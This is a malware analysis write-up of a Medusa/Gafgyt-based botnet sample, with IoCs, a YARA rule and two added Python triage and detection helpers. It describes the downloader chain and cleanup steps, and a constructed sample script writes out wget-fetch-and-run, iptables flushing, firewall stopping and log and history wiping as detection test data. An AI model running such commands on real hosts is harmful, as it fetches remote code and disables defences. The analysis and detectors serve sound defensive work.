In this article we analyze a sample of the Medusa botnet. The downloader script tries to change directory to /tmp, /var/run, /mnt, /root or /, uses wget to fetch the Gafgyt-based backdoor binaries, marks them executable with chmod +x, runs them and finally deletes them with rm -rf to clear traces. /mnt is on the list because, in some deployments, it is also where a host's root filesystem is mounted.
The main downloader script references the C&C IP address 213.142.148[.]13:
During testing, when one of the samples (the MIPS build) was downloaded, the Opera web filter flagged it as malicious:
Here are the details of the .mips ELF artifact: its entropy (about 5.28 bits per byte) indicates that it is not packed, and the entry point is 0x004002a0:
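The two checks used above (entry point and architecture from the ELF header, entropy as a packing heuristic) are easy to reproduce in a few lines. The following triage helper is an added example, not code from the original article or from the sample: the bytes it inspects are a constructed 32-bit big-endian MIPS header carrying the article's entry point 0x004002a0 followed by zero padding, not the real artifact, and the 7.0 bits/byte packing threshold is an assumed rule of thumb.

```python
import math
import struct
from collections import Counter

# e_machine values commonly seen in IoT botnet builds (from the ELF specification)
ELF_MACHINES = {3: "x86", 8: "MIPS", 20: "PowerPC", 40: "ARM", 62: "x86-64", 183: "AArch64"}

# Assumed rule of thumb: >= 7.0 bits/byte over the whole file usually means packed
# or encrypted; plain compiled code tends to sit around 5 to 6.5 (the article's 5.28).
PACKED_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_elf_header(data: bytes) -> dict:
    """Read class, endianness, machine and entry point from the ELF header."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    endian = {1: "<", 2: ">"}[ei_data]        # EI_DATA: 1 = LSB, 2 = MSB
    if ei_class == 1:                         # ELF32: e_entry/e_phoff/e_shoff are 32-bit
        fmt = endian + "HHIIIIIHHHHHH"
    elif ei_class == 2:                       # ELF64: they are 64-bit
        fmt = endian + "HHIQQQIHHHHHH"
    else:
        raise ValueError("unknown ELF class")
    e_type, e_machine, _version, e_entry = struct.unpack_from(fmt, data, 16)[:4]
    return {
        "class": 32 if ei_class == 1 else 64,
        "endian": "big" if ei_data == 2 else "little",
        "e_type": e_type,
        "machine": ELF_MACHINES.get(e_machine, f"unknown({e_machine})"),
        "entry": e_entry,
    }


def triage(data: bytes) -> dict:
    """Header fields plus the entropy-based packing verdict."""
    info = parse_elf_header(data)
    ent = shannon_entropy(data)
    info["entropy"] = round(ent, 2)
    info["likely_packed"] = ent >= PACKED_THRESHOLD
    return info


def build_sample() -> bytes:
    """Constructed stand-in: ELF32 MSB MIPS header, e_entry 0x004002a0, zero-filled body."""
    e_ident = b"\x7fELF" + bytes([1, 2, 1, 0, 0]) + b"\x00" * 7
    header = struct.pack(">HHIIIIIHHHHHH",
                         2,           # e_type: ET_EXEC
                         8,           # e_machine: EM_MIPS
                         1,           # e_version
                         0x004002a0,  # e_entry (value quoted in the article)
                         52,          # e_phoff
                         0,           # e_shoff
                         0,           # e_flags
                         52, 32, 1,   # e_ehsize, e_phentsize, e_phnum
                         40, 0, 0)    # e_shentsize, e_shnum, e_shstrndx
    return e_ident + header + b"\x00" * 1024


if __name__ == "__main__":
    print(triage(build_sample()))
```

Run it against the real file by replacing build_sample() with the file's bytes; for a packed Gafgyt build the entropy would climb toward 8 and likely_packed would flip to True.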
The network information and device details of the victim host are collected:
The malware relies on BusyBox, which bundles compact versions of many common Unix utilities, for its malicious tasks. We can also see a reference to gethostbyname, which resolves a hostname to addresses and can be used to learn about a network infrastructure from a given hostname:
We can see a comment saying not to use the Telnet protocol, and a reference to the C&C IP address 213.142.148[.]13 on port 25565 (currently a ping service):
The sample reaches out to the Google DNS servers 8.8.8.8 and 8.8.4.4 to learn which network interface is in use (a common trick for discovering the host's outbound address), then clears the folders /tmp, /var, /var/run, /var/tmp and /var/log. It wipes the iptables rules, kills busybox with pkill -9, stops the iptables and firewalld services, and clears the command history so as to leave no traces.
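The downloader behaviour described at the top of the article (cd into a writable directory, wget, chmod +x, execute, rm -rf) and the cleanup sequence above (pkill -9 busybox, iptables wiped, firewall services stopped, /var/log and the history cleared) are easy to catch with a heuristic pass over a captured script or shell history. The detector below is an added example, not code from the original article or from the sample: the script it scans is constructed for illustration (203.0.113.10 is a documentation address, not the real C&C), and the rule set and the three-category threshold are my own assumptions.

```python
import re

# One rule per stage of the behaviour the article describes.
# Patterns are assumptions for this example; tune them to the scripts you actually see.
RULES = {
    "staging_dir":     re.compile(r"\bcd\s+(?:/tmp|/var/run|/var/tmp|/mnt|/root|/)(?=\s|;|&|\||$)"),
    "fetch":           re.compile(r"\b(?:wget|curl|tftp)\b"),
    "make_executable": re.compile(r"\bchmod\s+(?:\+x|0?7[0-7][0-7])"),
    "self_delete":     re.compile(r"\brm\s+-rf?\s+(?!/var/log)"),
    "kill_busybox":    re.compile(r"\b(?:pkill|killall)\s+(?:-9\s+)?busybox\b"),
    "iptables_flush":  re.compile(r"\biptables\s+(?:-F|--flush)\b"),
    "firewall_stop":   re.compile(r"\b(?:service\s+(?:iptables|firewalld)\s+stop|systemctl\s+stop\s+(?:iptables|firewalld))\b"),
    "log_wipe":        re.compile(r"\brm\s+-rf?\s+/var/log"),
    "history_clear":   re.compile(r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b|HISTFILE=/dev/null"),
}

# Assumed threshold: three different stages in one script is a strong signal,
# while a lone wget or a lone rm -rf is everyday administration.
MIN_DISTINCT_TAGS = 3


def scan_script(text: str) -> list:
    """Return (line_number, tag, stripped_line) for every rule hit, one pass over the text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for tag, rx in RULES.items():
            if rx.search(line):
                findings.append((lineno, tag, line.strip()))
    return findings


def verdict(findings) -> tuple:
    """(is_suspicious, sorted list of distinct tags seen)."""
    tags = sorted({tag for _, tag, _ in findings})
    return len(tags) >= MIN_DISTINCT_TAGS, tags


# Constructed sample mimicking the downloader plus the cleanup steps.
# 203.0.113.10 is TEST-NET-3 (documentation range), not the C&C from the article.
SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://203.0.113.10/bins/x.mips -O x; chmod +x x; ./x; rm -rf x
pkill -9 busybox
iptables -F
service iptables stop
systemctl stop firewalld
rm -rf /var/log/*
history -c
"""

# Constructed benign script: a cd and an archive job should not trip the verdict.
BENIGN_SCRIPT = """#!/bin/sh
cd /home/backup
tar czf site.tgz /var/www
"""

if __name__ == "__main__":
    hits = scan_script(SAMPLE_SCRIPT)
    for lineno, tag, line in hits:
        print(f"{lineno:3d} {tag:16s} {line}")
    print("suspicious:", verdict(hits))
    print("benign script:", verdict(scan_script(BENIGN_SCRIPT)))
```

The same scan_script() can be pointed at ~/.bash_history, an auditd execve trail flattened to one command per line, or the body of a downloader fetched from the C&C; the per-line tags tell an analyst which stage of the chain each line belongs to rather than only yielding a yes/no.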
Here is a recap of the strings extracted from the artifact itself; they include user agents, the C&C IP address and credentials. The artifact attacks servers with weak SSH passwords and focuses on DDoS tasks.
The C&C IP address is registered in Turkey to "HOSTING DUNYAM BILGI ILETISIM TEKNOLOJILERI TICARET LIMITED SIRKETI":
The open ports and services are 80 (HTTP, Apache httpd 2.4.41), 1012 (a service that seems to be tied to a username credential) and 22 (SSH):
The IP address 213.142.148[.]13 is attacking a lot of nginx servers, as recent OSINT detections and evidence show:
Indicators of compromise:
- SHA-256: f99f9696f79fb7b703dddbc1f299a6622857a75a2cedfa66c0c2b3635572ab1b
- SHA-1: a0b2c839ef20a95b9e5c0642598c15f876ec0adb
- MD5: b0dfd9d372133a26c0be904725f78b09
- SHA-256: 8edf7088424c71a87121b3dcad1b45982ebd3937f9ceb27e5bdde81b6c708cc9
- SHA-1: 94562891258e00e58dd98b2a7b295c4945675ced
- MD5: 76bc2ecad5860548788a07ce2329c302
- C&C IP address: 213.142.148[.]13
- SSH fingerprint: 7c2ee2007ddfe17e9d15d8e50f92f0a1adc9367f120a51363f279932991e5b43
- fy4fkc1txz22mldwtj4ipcevw5q8aq1 (string observed in the BusyBox session)
YARA rule (VirusTotal Livehunt; the vt module must be imported, and the IP is written un-defanged because the "[.]" form used in this write-up never appears in a real URL, so a rule containing it would never match):
import "vt"

rule MedusaBotnetCnC_20092025 {
    meta:
        description = "Detects Medusa botnet with C&C information of a sample first seen on 20th September 2025"
    condition:
        // match any URL containing the C&C address seen in the downloader and the binary
        vt.net.url.raw icontains "213.142.148.13"
}